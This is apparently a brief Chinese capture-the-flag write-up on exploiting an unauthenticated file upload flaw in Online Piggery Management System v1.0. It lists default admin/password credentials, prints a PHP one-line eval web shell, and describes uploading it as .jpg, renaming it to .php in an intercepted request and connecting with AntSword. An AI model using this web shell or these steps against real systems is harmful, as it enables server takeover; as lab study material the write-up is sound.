非常简单的文件上传,唯一的难点就是猜密码
简介
Online Piggery Management System v1.0 - 存在未授权的文件上传漏洞
正文
1.打开靶场,发现需要登录,密码为admin/password,当时我没猜出来又懒得爆破,直接参考https://blog.csdn.net/shr592833253/article/details/137600583得到密码
2.进入过后直接找上传文件的地方
3.点击右边加号,随便填写信息,上传一句话木马,后缀为jpg
一句话木马
<?php @eval($_POST['cmd']);?>
4.抓包,将jpg改为php
5.右键上传的文件,得到文件存放链接
6.蚁剑连接
7.得到flag